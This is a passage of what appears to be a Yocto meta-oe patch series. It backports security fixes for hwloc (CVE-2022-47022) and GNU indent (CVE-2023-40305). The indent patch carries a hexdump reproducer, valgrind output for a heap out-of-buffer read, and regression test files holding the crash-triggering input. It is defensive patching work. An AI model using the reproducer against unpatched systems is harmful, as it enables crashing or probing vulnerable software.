nr_cpus = setsize * 8; /* that's the value that was actually tested */ + if (!err) +@@ -732,8 +737,12 @@ hwloc_linux_get_tid_cpubind(hwloc_topology_t topology __hwloc_attribute_unused, + + /* find the kernel nr_cpus so as to use a large enough cpu_set size */ + kernel_nr_cpus = hwloc_linux_find_kernel_nr_cpus(topology); ++ if (kernel_nr_cpus < 0) ++ return -1; + setsize = CPU_ALLOC_SIZE(kernel_nr_cpus); + plinux_set = CPU_ALLOC(kernel_nr_cpus); ++ if (!plinux_set) ++ return -1; + + err = sched_getaffinity(tid, setsize, plinux_set); + +@@ -1092,6 +1101,8 @@ hwloc_linux_set_thread_cpubind(hwloc_topology_t topology, pthread_t tid, hwloc_c + + setsize = CPU_ALLOC_SIZE(last+1); + plinux_set = CPU_ALLOC(last+1); ++ if (!plinux_set) ++ return -1; + + CPU_ZERO_S(setsize, plinux_set); + hwloc_bitmap_foreach_begin(cpu, hwloc_set) +@@ -1184,6 +1195,8 @@ hwloc_linux_get_thread_cpubind(hwloc_topology_t topology, pthread_t tid, hwloc_b + + setsize = CPU_ALLOC_SIZE(last+1); + plinux_set = CPU_ALLOC(last+1); ++ if (!plinux_set) ++ return -1; + + err = pthread_getaffinity_np(tid, setsize, plinux_set); + if (err) { +-- +2.40.0 diff --git a/meta-oe/recipes-extended/hwloc/hwloc_1.11.13.bb b/meta-oe/recipes-extended/hwloc/hwloc_1.11.13.bb index e6fed584f9..83c85dbe3e 100644 --- a/meta-oe/recipes-extended/hwloc/hwloc_1.11.13.bb +++ b/meta-oe/recipes-extended/hwloc/hwloc_1.11.13.bb @@ -7,7 +7,9 @@ SECTION = "base" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://COPYING;md5=3282e20dc3cec311deda3c6d4b1f990b" -SRC_URI = "https://www.open-mpi.org/software/${BPN}/v1.11/downloads/${BP}.tar.bz2" +SRC_URI = "https://www.open-mpi.org/software/${BPN}/v1.11/downloads/${BP}.tar.bz2 \ + file://CVE-2022-47022.patch \ + " SRC_URI[md5sum] = "3c792e23c209e9e1bafe9bdbc613d401" SRC_URI[sha256sum] = "a4494b7765f517c0990d1c7f09d98cb87755bb6b841e4e2cbfebca1b14bac9c8" diff --git a/meta-oe/recipes-extended/indent/indent/CVE-2023-40305_0001.patch b/meta-oe/recipes-extended/indent/indent/CVE-2023-40305_0001.patch new file mode 100644 index 0000000000..367202e3c5 --- /dev/null +++ b/meta-oe/recipes-extended/indent/indent/CVE-2023-40305_0001.patch @@ -0,0 +1,4196 @@ +From df4ab2d19e247d059e0025789ba513418073ab6f Mon Sep 17 00:00:00 2001 +From: Petr Písař <ppisar@redhat.com> +Date: Thu, 19 Oct 2023 07:36:32 +0000 +Subject: [PATCH] Fix an out-of-buffer read in search_brace()/lexi() on an + condition without parentheses followed with an overlong comment +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Reproducer: + +$ hexdump -C /tmp/short +00000000 69 66 20 30 3b 65 6c 73 65 2f 2a 0a 0a 0a 0a 0a |if 0;else/*.....| +00000010 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a |................| +* +00000800 0a 0a 2a 2f 78 0a |..*/x.| +00000806 + +$ valgrind -- ./indent -o /dev/null /tmp/short +[...] +==21830== Invalid read of size 1 +==21830== at 0x40586A: lexi (lexi.c:251) +==21830== by 0x40198C: search_brace (indent.c:387) +==21830== by 0x401CC2: indent_main_loop (indent.c:548) +==21830== by 0x402298: indent (indent.c:758) +==21830== by 0x402941: indent_single_file (indent.c:1003) +==21830== by 0x402A0F: indent_all (indent.c:1041) +==21830== by 0x402BC5: main (indent.c:1122) +==21830== Address 0x4ab2210 is 0 bytes inside a block of size 2,048 free'd +==21830== at 0x4847A40: realloc (vg_replace_malloc.c:1649) +==21830== by 0x408BC0: xrealloc (globs.c:64) +==21830== by 0x40BF03: need_chars (handletoken.c:89) +==21830== by 0x401433: sw_buffer (indent.c:149) +==21830== by 0x401973: search_brace (indent.c:380) +==21830== by 0x401CC2: indent_main_loop (indent.c:548) +==21830== by 0x402298: indent (indent.c:758) +==21830== by 0x402941: indent_single_file (indent.c:1003) +==21830== by 0x402A0F: indent_all (indent.c:1041) +==21830== by 0x402BC5: main (indent.c:1122) +==21830== Block was alloc'd at +==21830== at 0x4847A40: realloc (vg_replace_malloc.c:1649) +==21830== by 0x408BC0: xrealloc (globs.c:64) +==21830== by 0x40BF03: need_chars (handletoken.c:89) +==21830== by 0x401696: search_brace (indent.c:281) +==21830== by 0x401CC2: indent_main_loop (indent.c:548) +==21830== by 0x402298: indent (indent.c:758) +==21830== by 0x402941: indent_single_file (indent.c:1003) +==21830== by 0x402A0F: indent_all (indent.c:1041) +==21830== by 0x402BC5: main (indent.c:1122) + +The cause was that need_chars(&save_com, ...) could reallocate save_com.ptr +pointer keeping a dangling copy of that pointer saved to buf_ptr +a line above. + +Related to CVE-2023-40305 + +Signed-off-by: Petr Písař <ppisar@redhat.com> + +CVE: CVE-2023-40305 + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/indent.git/commit/?id=df4ab2d19e247d059e0025789ba513418073ab6f] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + regression/TEST | 3 +- + regression/input/comment-heap-overread.c | 2040 ++++++++++++++++++ + regression/standard/comment-heap-overread.c | 2042 +++++++++++++++++++ + src/indent.c | 2 +- + 4 files changed, 4085 insertions(+), 2 deletions(-) + create mode 100644 regression/input/comment-heap-overread.c + create mode 100644 regression/standard/comment-heap-overread.c + +diff --git a/regression/TEST b/regression/TEST +index 56f41d9..a7a6747 100755 +--- a/regression/TEST ++++ b/regression/TEST +@@ -37,7 +37,8 @@ BUGS="case-label.c one-line-1.c one-line-2.c one-line-3.c \ + one-line-4.c struct-decl.c sizeof-in-while.c line-break-comment.c \ + macro.c enum.c elif.c nested.c wrapped-string.c minus_predecrement.c \ + bug-gnu-33364.c float-constant-suffix.c block-comments.c \ +- no-forced-nl-in-block-init.c hexadecimal_float.c" ++ no-forced-nl-in-block-init.c hexadecimal_float.c \ ++ comment-heap-overread.c" + + INDENTSRC="args.c backup.h backup.c dirent_def.h globs.c indent.h \ + indent.c indent_globs.h io.c lexi.c memcpy.c parse.c pr_comment.c \ +diff --git a/regression/input/comment-heap-overread.c b/regression/input/comment-heap-overread.c +new file mode 100644 +index 0000000..5b0b172 +--- /dev/null ++++ b/regression/input/comment-heap-overread.c +@@ -0,0 +1,2040 @@ ++if 0;else/* ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++*/x +diff --git a/regression/standard/comment-heap-overread.c b/regression/standard/comment-heap-overread.c +new file mode 100644 +index 0000000..e601fb4 +--- /dev/null ++++ b/regression/standard/comment-heap-overread.c +@@ -0,0 +1,2042 @@ ++if 0; ++else /* ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ ++ 